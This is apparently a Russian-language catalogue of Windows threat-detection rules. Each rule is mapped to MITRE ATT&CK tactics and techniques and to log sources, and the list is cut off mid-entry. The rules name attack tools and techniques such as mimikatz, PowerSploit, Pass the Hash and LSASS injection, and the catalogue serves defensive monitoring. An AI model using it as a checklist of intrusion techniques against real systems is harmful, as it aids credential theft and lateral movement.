Зафиксирована маскировка запуска PowerShell

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.005 (Masquerading: Match Legitimate Resource Name or Location), T1036.006 (Masquerading: Match Legitimate Resource Name or Location), T1036.007 (Masquerading: Double File Extension), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-373

Зафиксировано использование WinApi через PowerShell

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1055 (Process Injection), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1106 (Native API)

PowerShell

Microsoft

Windows

RV-D-374

Зафиксировано использование хакерской утилиты PowerSploit

TA0005 (Defense Evasion), TA0004 (Privilege Escalation), TA0003 (Persistence), TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1005 (Data from Local System), T1006 (Direct Volume Access), T1012 (Query Registry), T1027 (Obfuscated Files or Information), T1027.005 (Obfuscated Files or Information: Indicator Removal from Tools), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1047 (Windows Management Instrumentation), T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At), T1053.005 (Scheduled Task/Job: Scheduled Task), T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection), T1056 (Input Capture), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1113 (Screen Capture), T1123 (Audio Capture), T1134 (Access Token Manipulation), T1212 (Exploitation for Credential Access), T1222 (File and Directory Permissions Modification), T1222.001 (File and Directory Permissions Modification: Windows File and Directory Permissions Modification), T1482 (Domain Trust Discovery), T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), T1547.005 (Boot or Logon Autostart Execution: Security Support Provider), T1552 (Unsecured Credentials), T1552.002 (Unsecured Credentials: Credentials in Registry), T1552.006 (Unsecured Credentials: Group Policy Preferences), T1555 (Credentials from Password Stores), T1555.004 (Credentials from Password Stores: Windows Credential Manager), T1558 (Steal or Forge Kerberos Tickets), T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting), T1574 (Hijack Execution Flow), T1574.001 (Hijack Execution Flow: DLL), T1574.007 (Hijack Execution Flow: Path Interception by PATH Environment Variable), T1574.008 (Hijack Execution Flow: Path Interception by Search Order Hijacking), T1574.009 (Hijack Execution Flow: Path Interception by Unquoted Path), T1588 (Obtain Capabilities), T1588.002 (Obtain Capabilities: Tool), T1620 (Reflective Code Loading)

PowerShell

Microsoft

Windows

RV-D-375

Зафиксировано использование хакерской утилиты PSMapExec

TA0008 (Lateral Movement)

T1021 (Remote Services), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1078 (Valid Accounts), T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket), T1569 (System Services)

PowerShell

Microsoft

Windows

RV-D-376

Зафиксировано использование хакерской утилиты SharpHound

TA0007 (Discovery)

T1018 (Remote System Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1482 (Domain Trust Discovery)

PowerShell

Microsoft

Windows

RV-D-377

Создание запланированной задачи через FileCreation

TA0002 (Execution), TA0003 (Persistence), TA0004 (Privilege Escalation)

T1053 (Scheduled Task/Job), T1053.005 (Scheduled Task/Job: Scheduled Task)

Sysmon

Microsoft

Windows

RV-D-378

Процесс загрузил модуль по UNC-пути

TA0002 (Execution)

T1129 (Shared Modules)

Sysmon

Microsoft

Windows

RV-D-379

URL-схема в командной строке процесса

TA0002 (Execution)

T1129 (Shared Modules)

Security

Microsoft

Windows

RV-D-380

Использование вредоносных утилит

TA0005 (Defense Evasion), TA0002 (Execution)

T1006 (Direct Volume Access), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-381

PowerShell инициировал сетевое подключение

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-382

Эксплуатация уязвимости в WinRAR - CVE-2023-38831

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Sysmon

Microsoft

Windows

RV-D-383

Зафиксированы подозрительные операции при помощи WMI

Security

Microsoft

Windows

RV-D-384

Потенциальное выполнение скрипта через WScript/CScript

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.005 (Command and Scripting Interpreter: Visual Basic), T1059.007 (Command and Scripting Interpreter: JavaScript)

Security, Sysmon

Microsoft

Windows

RV-D-385

Использование PowerShell через сторонние инструменты

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-386

Изменение пароля пользователя или хоста с помощью Ksetup.exe

TA0040 (Impact)

T1531 (Account Access Removal)

Security, Sysmon

Microsoft

Windows

RV-D-387

Добавление потенциально подозрительного источника загрузки в Winget

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-388

Извлечение cab-файлов через Wusa.EXE

TA0002 (Execution)

Security, Sysmon

Microsoft

Windows

RV-D-389

Изменение политики выполнения PowerShell

TA0005 (Defense Evasion)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-390

Запуск скрипта из временной директории

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.005 (Command and Scripting Interpreter: Visual Basic), T1059.006 (Command and Scripting Interpreter: Python), T1059.007 (Command and Scripting Interpreter: JavaScript)

Security, Sysmon

Microsoft

Windows

RV-D-391

Создание Self Extracting Package в подозрительном месте

TA0002 (Execution)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-392

Создание или изменение сервиса с помощью утилит в командной строке

TA0040 (Impact)

T1489 (Service Stop)

Security

Microsoft

Windows

RV-D-393

Создан сервис с подозрительными параметрами

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security

Microsoft

Windows

RV-D-394

Изменение критичных параметров сервиса

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security, Sysmon

Microsoft

Windows

RV-D-395

Изменение пути до исполняемого файла в сервисе нестандартными путями

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security, Sysmon

Microsoft

Windows

RV-D-396

Установлен сервис не из системного/стандартного пути

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security

Microsoft

Windows

RV-D-397

Использование библиотеки cygwin1.dll

TA0011 (Command and Control)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)

Sysmon

Microsoft

Windows

RV-D-398

Выполнение команд в системе от редактора кода VSCode

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1176 (Software Extensions), T1176.002 (Software Extensions: IDE Extensions), T1204 (User Execution), T1204.001 (User Execution: Malicious Link)

Security, Sysmon

Microsoft

Windows

RV-D-399

Удаленное подключение к узлу через туннелирование в VSCode

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1176 (Software Extensions), T1176.002 (Software Extensions: IDE Extensions), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1219 (Remote Access Tools), T1219.001 (Remote Access Tools: IDE Tunneling), T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-400

Зафиксирована загрузка модуля WMI подозрительным процессом

TA0002 (Execution)

T1047 (Windows Management Instrumentation)

Sysmon

Microsoft

Windows

RV-D-401

Экспорт структуры AD через csvde.exe

TA0007 (Discovery)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)

Security, Sysmon

Microsoft

Windows

RV-D-402

Сбор структуры AD cредствами Ldifde

TA0009 (Collection), TA0002 (Execution)

T1005 (Data from Local System)

Security, Sysmon

Microsoft

Windows

RV-D-403

Загрузка amsi.dll необычным процессом.

TA0005 (Defense Evasion), TA0040 (Impact)

T1490 (Inhibit System Recovery)

Sysmon

Microsoft

Windows

RV-D-404

Загрузка RstrtMgr.dll необычным процессом

TA0005 (Defense Evasion), TA0040 (Impact)

T1486 (Data Encrypted for Impact), T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-405

Изменение фона рабочего стола через реестр

TA0005 (Defense Evasion), TA0040 (Impact)

T1112 (Modify Registry), T1491 (Defacement), T1491.001 (Defacement: Internal Defacement)

Sysmon

Microsoft

Windows

RV-D-406

Отключение системы восстановления в реестре.

TA0040 (Impact)

T1490 (Inhibit System Recovery)

Sysmon

Microsoft

Windows

RV-D-407

Манипуляции с теневыми копиями с помощью встроенных утилит

TA0040 (Impact)

T1490 (Inhibit System Recovery)

Security

Microsoft

Windows

RV-D-408

Вход на устройство под разными учетными записями

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-409

Интерактивный вход под сервисной учетной записью

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-410

Вход под несуществующим пользователем

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-411

Вход под учетной записью, созданной по умолчанию

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts)

Security

Microsoft

Windows

RV-D-412

Вход под учётной записью администратора

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-413

Вход с разных хостов на один хост под одной учетной записью

TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-414

Вход на несколько узлов под одной учетной записью

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts)

Security

Microsoft

Windows

RV-D-415

Зафиксирована установка удаленной сессии при помощи WMI

TA0008 (Lateral Movement)

T1047 (Windows Management Instrumentation)

Security

Microsoft

Windows

RV-D-416

Использование инструмента SharpMove

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.002 (Remote Services: SMB/Windows Admin Shares)

Security, Sysmon

Microsoft

Windows

RV-D-417

Удаленный запуск процесса с помощью DCOM объекта MMC20.Application

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model)

Security

Microsoft

Windows

RV-D-418

Удаленная эксплуатация DCOM объекта ShellWindows

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model)

Security

Microsoft

Windows

RV-D-419

Удаленный запуск процесса с помощью WMI

TA0008 (Lateral Movement)

T1021 (Remote Services)

Security

Microsoft

Windows

RV-D-420

Подключение к SMB папке по протоколу QUIC

TA0008 (Lateral Movement)

T1570 (Lateral Tool Transfer)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-421

Удаленное выполнение команд с помощью SMBExec

TA0003 (Persistence), TA0008 (Lateral Movement), TA0002 (Execution)

T1021 (Remote Services), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1569 (System Services), T1569.002 (System Services: Service Execution), T1570 (Lateral Tool Transfer)

Security

Microsoft

Windows

RV-D-422

Создание новой доменной\локальной\компьютерной учетной записи

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-423

Закрепление через ключ реестра Debugger отладчика AeDebug

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution)

Sysmon

Microsoft

Windows

RV-D-424

Смена ассоциации запуска файла

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.001 (Event Triggered Execution: Change Default File Association)

Sysmon

Microsoft

Windows

RV-D-425

Изменение пароля через утилиту mimikatz

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-426

Удаление доменной\локальной\компьютерной учетной записи

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-427

Зафиксировано добавление в AppCert DLL полезной нагрузки

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.009 (Event Triggered Execution: AppCert DLLs)

Sysmon

Microsoft

Windows

RV-D-428

Зафиксировано добавление в Appinit DLL полезной нагрузки

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.010 (Event Triggered Execution: AppInit DLLs)

Sysmon

Microsoft

Windows

RV-D-429

Зафиксирована подмена файлов, отвечающих за функции специальных возможностей Windows

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.008 (Event Triggered Execution: Accessibility Features)

Sysmon

Microsoft

Windows

RV-D-430

Cоздание WMI подписки

TA0002 (Execution)

T1047 (Windows Management Instrumentation), T1546 (Event Triggered Execution), T1546.003 (Event Triggered Execution: Windows Management Instrumentation Event Subscription)

Sysmon

Microsoft

Windows

RV-D-431

Внедрение стороннего ПО через отладчик IFEO

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.012 (Event Triggered Execution: Image File Execution Options Injection)

Sysmon

Microsoft

Windows

RV-D-432

Добавление в Netsh Helper DLL потенциальной полезной нагрузки

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.007 (Event Triggered Execution: Netsh Helper DLL)

Sysmon

Microsoft

Windows

RV-D-433

Зафиксировано добавление исполняемого файла к профилю PowerShell

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.013 (Event Triggered Execution: PowerShell Profile)

PowerShell, Sysmon

Microsoft

Windows

RV-D-434

Закрепление через Shim

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.011 (Event Triggered Execution: Application Shimming)

Security, Sysmon

Microsoft

Windows

RV-D-435

Создана учетная запись пользователя, замаскированная под учетную запись компьютера

TA0003 (Persistence)

Security

Microsoft

Windows

RV-D-436

Включение или отключение учетной записи

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-437

Создание и удаление учетной записи в течении одной минуты

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-438

Изменение SPN учетной записи

TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-439

Эксплуатация сценариев входа в систему

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1037 (Boot or Logon Initialization Scripts), T1037.001 (Boot or Logon Initialization Scripts: Logon Script (Windows))

Security, Sysmon

Microsoft

Windows

RV-D-440

Закрепление в системе путем изменения ключей автозапуска в реестре

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)

Sysmon

Microsoft

Windows

RV-D-441

Зафиксировано возможное закрепление в системе посредством помещения файла в директорию автозагрузки

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)

Security, Sysmon

Microsoft

Windows

RV-D-442

Эксплуатация Active Setup в реестре

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.014 (Boot or Logon Autostart Execution: Active Setup)

Security, Sysmon

Microsoft

Windows

RV-D-443

Закрепление в системе посредством создания/изменения пакетов проверки подлинности в реестре

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.002 (Boot or Logon Autostart Execution: Authentication Package)

Security, Sysmon

Microsoft

Windows

RV-D-444

Закрепление через COM Hijacking

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0002 (Execution)

T1546 (Event Triggered Execution), T1546.015 (Event Triggered Execution: Component Object Model Hijacking), T1559 (Inter-Process Communication), T1559.001 (Inter-Process Communication: Component Object Model)

Sysmon

Microsoft

Windows

RV-D-445

Эксплуатация драйверов LSASS в реестре

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.008 (Boot or Logon Autostart Execution: LSASS Driver)

Security, Sysmon

Microsoft

Windows

RV-D-446

Эксплуатация Port Monitors в реестре

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.010 (Boot or Logon Autostart Execution: Port Monitors)

Security, Sysmon

Microsoft

Windows

RV-D-447

Закрепление в системе посредством эксплуатации Print Processors в файловой системе через подозрительную dll

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.012 (Boot or Logon Autostart Execution: Print Processors)

Security, Sysmon

Microsoft

Windows

RV-D-448

Закрепление в системе посредством эксплуатации Print Processors в реестре

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.012 (Boot or Logon Autostart Execution: Print Processors)

Security, Sysmon

Microsoft

Windows

RV-D-449

Закрепление в системе посредством эксплуатации SSP (Security Support Provider) в реестре

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.005 (Boot or Logon Autostart Execution: Security Support Provider)

Security, Sysmon

Microsoft

Windows

RV-D-450

Создания/изменения ключей поставщиков времени в реестре

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.003 (Boot or Logon Autostart Execution: Time Providers)

Security, Sysmon

Microsoft

Windows

RV-D-451

Добавление в реестр автозапускаемых файлов процессом Winlogon

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.004 (Boot or Logon Autostart Execution: Winlogon Helper DLL)

Security, Sysmon

Microsoft

Windows

RV-D-452

Произошло выполнение полезной нагрузки при наступлении WMI события

TA0002 (Execution)

T1047 (Windows Management Instrumentation), T1546 (Event Triggered Execution), T1546.003 (Event Triggered Execution: Windows Management Instrumentation Event Subscription)

Sysmon

Microsoft

Windows

RV-D-453

Запуск файла из Корзины

TA0003 (Persistence), TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Security, Sysmon

Microsoft

Windows

RV-D-454

Включение переменных среды COR Profiler

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1574 (Hijack Execution Flow), T1574.012 (Hijack Execution Flow: COR_PROFILER)

Sysmon

Microsoft

Windows

RV-D-455

Закрепление в системе через ключ реестра MyComputer

TA0003 (Persistence)

Sysmon

Microsoft

Windows

RV-D-456

Изменение настроек администратора Winget

TA0005 (Defense Evasion), TA0003 (Persistence)

Sysmon

Microsoft

Windows

RV-D-457

Сброс пароля от учетной записи через утилиту mimikatz

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-458

Манипулирование запланированными задачами через реестр

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.005 (Scheduled Task/Job: Scheduled Task)

Sysmon

Microsoft

Windows

RV-D-459

Изменения в планировщике задач

TA0003 (Persistence), TA0002 (Execution)

T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At), T1053.005 (Scheduled Task/Job: Scheduled Task)

Security

Microsoft

Windows

RV-D-460

Загрузка несуществующей dll для сервисов IKE, IKEEXT, SessionEnv

TA0005 (Defense Evasion), TA0003 (Persistence)

T1574 (Hijack Execution Flow), T1574.001 (Hijack Execution Flow: DLL), T1574.002 (DLL Side-Loading)

Sysmon

Microsoft

Windows

RV-D-461

Зафиксирована подгрузка подозрительного пакета процессом LSA

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.005 (Boot or Logon Autostart Execution: Security Support Provider)

Security

Microsoft

Windows

RV-D-462

Зафиксирована подмена файлов экрана заставки Windows

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.002 (Event Triggered Execution: Screensaver)

Sysmon

Microsoft

Windows

RV-D-463

Добавление пользователя в критичные доменные группы

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

Security

Microsoft

Windows

RV-D-464

Добавление пользователя в критичные локальные группы

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

Security

Microsoft

Windows

RV-D-465

Выполнение манипуляций над учетной записи с помощью стороннего ПО

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-466

Обнаружено использование службы BITS Jobs

TA0003 (Persistence)

T1197 (BITS Jobs)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-467

Удалена глобальная группа с включенной безопасностью

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-468

Детектирование создания wmi подписки

TA0002 (Execution)

T1047 (Windows Management Instrumentation), T1546 (Event Triggered Execution), T1546.003 (Event Triggered Execution: Windows Management Instrumentation Event Subscription)

Security

Microsoft

Windows

RV-D-469

Создание удаленного потока c использованием функции LoadLibrary

TA0005 (Defense Evasion)

T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection)

Sysmon

Microsoft

Windows

RV-D-470

Создание удаленного потока подозрительным процессом.

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1055 (Process Injection)

Sysmon

Microsoft

Windows

RV-D-471

Изменена групповая политика домена по умолчанию

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-472

Кража токена доступа из системного процесса

TA0004 (Privilege Escalation)

T1134 (Access Token Manipulation), T1134.001 (Access Token Manipulation: Token Impersonation/Theft)

Sysmon

Microsoft

Windows

RV-D-473

Удален объект групповой политики

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-474

Изменение атрибутов групповой политики

TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-475

Кража токена через именованные каналы

TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.001 (Access Token Manipulation: Token Impersonation/Theft)

Sysmon

Microsoft

Windows

RV-D-476

Несистемный процесс повысил привилегии до системных (CreateProcessWithToken)

TA0004 (Privilege Escalation)

T1134 (Access Token Manipulation)

Security

Microsoft

Windows

RV-D-477

Несистемный процесс повысил привилегии до системного

TA0004 (Privilege Escalation)

T1134 (Access Token Manipulation)

Security, Sysmon

Microsoft

Windows

RV-D-478

Изменение дескриптора безопасности в групповой политике

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-490

Поиск данных в сетевых папках Windows

TA0009 (Collection)

T1039 (Data from Network Shared Drive)

Security

Microsoft

Windows

RV-D-491

Размещение архивов в сетевой папке Windows

TA0009 (Collection)

T1074 (Data Staged), T1074.002 (Data Staged: Remote Data Staging), T1560 (Archive Collected Data)

Security

Microsoft

Windows

RV-D-493

Доступ к чувствительному сетевому диску Windows

TA0009 (Collection)

T1039 (Data from Network Shared Drive)

Security

Microsoft

Windows

RV-D-494

Использование утилиты Smbtakeover

TA0006 (Credential Access), TA0008 (Lateral Movement), TA0002 (Execution)

T1021 (Remote Services), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1047 (Windows Management Instrumentation), T1557 (Adversary-in-the-Middle), T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay)

Security, Sysmon

Microsoft

Windows

RV-D-495

Изменение конфигурации загрузки безопасного режима

TA0005 (Defense Evasion)

T1562.009 (Impair Defenses: Safe Mode Boot)

Security, Sysmon

Microsoft

Windows

RV-D-508

Уничтожение информации на диске в Windows

TA0040 (Impact)

T1561 (Disk Wipe), T1561.001 (Disk Wipe: Disk Content Wipe), T1561.002 (Disk Wipe: Disk Structure Wipe)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-519

Атака Bad USB Windows

TA0001 (Initial Access), TA0002 (Execution)

T1091 (Replication Through Removable Media), T1092 (Communication Through Removable Media), T1200 (Hardware Additions), T1674 (Input Injection)

Security, Sysmon

Microsoft

Windows

RV-D-529

Удаленная эксплуатация DCOM объекта Excel.Application

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model)

Security

Microsoft

Windows

RV-D-530

Удаленная отладка браузера Windows

TA0009 (Collection)

T1185 (Browser Session Hijacking), T1539 (Steal Web Session Cookie)

Security, Sysmon

Microsoft

Windows

RV-D-531

Удаление метки MOTW Windows

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass), T1564 (Hide Artifacts), T1564.004 (Hide Artifacts: NTFS File Attributes)

Sysmon

Microsoft

Windows

RV-D-532

Атака Code Signing Windows

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.002 (Subvert Trust Controls: Code Signing)

Security, Sysmon

Microsoft

Windows

RV-D-533

SIP Hijacking Windows

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.003 (Subvert Trust Controls: SIP and Trust Provider Hijacking)

Security, Sysmon

Microsoft

Windows

RV-D-534

Атака CS Policy Modification

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.002 (Subvert Trust Controls: Code Signing), T1553.006 (Subvert Trust Controls: Code Signing Policy Modification)

Security, Sysmon

Microsoft

Windows

RV-D-535

Обнаружение стеганографии в Windows

TA0011 (Command and Control), TA0005 (Defense Evasion)

T1001 (Data Obfuscation), T1001.002 (Data Obfuscation: Steganography), T1027 (Obfuscated Files or Information), T1027.003 (Obfuscated Files or Information: Steganography)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-537

Извлечение содержимого буфера в Windows

TA0009 (Collection)

T1115 (Clipboard Data)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-539

Поиск учетных данных в групповых политиках

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.006 (Unsecured Credentials: Group Policy Preferences)

Security

Microsoft

Windows

RV-D-540

Создание удаленного потока в процессе Lsass

TA0004 (Privilege Escalation)

T1055 (Process Injection), T1055.003 (Process Injection: Thread Execution Hijacking)

Sysmon

Microsoft

Windows

RV-D-541

Перехват RDP соединения

TA0008 (Lateral Movement)

T1563 (Remote Service Session Hijacking), T1563.002 (Remote Service Session Hijacking: RDP Hijacking)

Security, Sysmon

Microsoft

Windows

RV-D-542

Получение учетных данных из реестра

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.002 (Unsecured Credentials: Credentials in Registry)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-543

Использование утилиты TikiTorch

TA0004 (Privilege Escalation)

T1055 (Process Injection), T1055.003 (Process Injection: Thread Execution Hijacking)

Sysmon

Microsoft

Windows

RV-D-544

Атака Pass the Ticket

TA0005 (Defense Evasion)

T1550 (Use Alternate Authentication Material), T1550.003 (Use Alternate Authentication Material: Pass the Ticket)

Security, Sysmon

Microsoft

Windows

RV-D-545

Атака Pass the Hash

TA0005 (Defense Evasion)

T1550 (Use Alternate Authentication Material), T1550.002 (Use Alternate Authentication Material: Pass the Hash)

Security, Sysmon

Microsoft

Windows

RV-D-573

Обнаружение HTML/SVG Smuggling в Windows

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.006 (Obfuscated Files or Information: HTML Smuggling), T1027.017 (Obfuscated Files or Information: SVG Smuggling)

Sysmon

Microsoft

Windows

RV-D-574

Скрытие учетной записи через реестр Windows

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.002 (Hide Artifacts: Hidden Users)

Security, Sysmon

Microsoft

Windows

RV-D-575

Компрометация через KrbRelayUp

TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation)

Security, Sysmon

Microsoft

Windows

RV-D-580

Создание подозрительного процесса от hh.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.001 (System Binary Proxy Execution: Compiled HTML File)

Security, Sysmon

Microsoft

Windows

RV-D-581

Изменение прав доступа к файлам

TA0005 (Defense Evasion)

T1222 (File and Directory Permissions Modification), T1222.001 (File and Directory Permissions Modification: Windows File and Directory Permissions Modification)

Security

Microsoft

Windows

RV-D-582

Скачивание удаленного файла средствами hh.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.001 (System Binary Proxy Execution: Compiled HTML File)

Security, Sysmon

Microsoft

Windows

RV-D-595

Загрузка dll-библиотеки средствами mavinject

TA0005 (Defense Evasion)

